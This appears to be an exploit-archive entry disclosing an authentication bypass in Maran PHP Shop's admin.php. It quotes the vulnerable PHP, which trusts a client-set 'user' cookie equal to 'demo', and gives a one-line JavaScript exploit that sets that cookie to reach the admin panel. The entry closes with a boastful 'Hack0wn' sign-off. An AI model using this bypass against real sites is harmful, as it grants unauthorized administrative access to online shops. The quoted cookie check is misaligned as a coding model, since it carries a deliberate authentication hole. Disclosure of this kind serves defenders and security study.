id: 4034
date: 11/02/2008
title: Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
author: JosS
cves: 

=================================================================
Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
=================================================================


# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability
# url: http://www.maran.pamil-visions.com/maranshop.php
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: /admin.php
vuln code:
<?
$readcookie = $_COOKIE['user'];
if($readcookie!="demo"){echo "error 467. bad login! <a href='login.php'>login here</a>";exit;}
//echo $_COOKIE['user'];
?>

exploit:
javascript:document.cookie = "user=demo; path=/";

Hack0wn :D



#  0day.today [2023-03-21]  #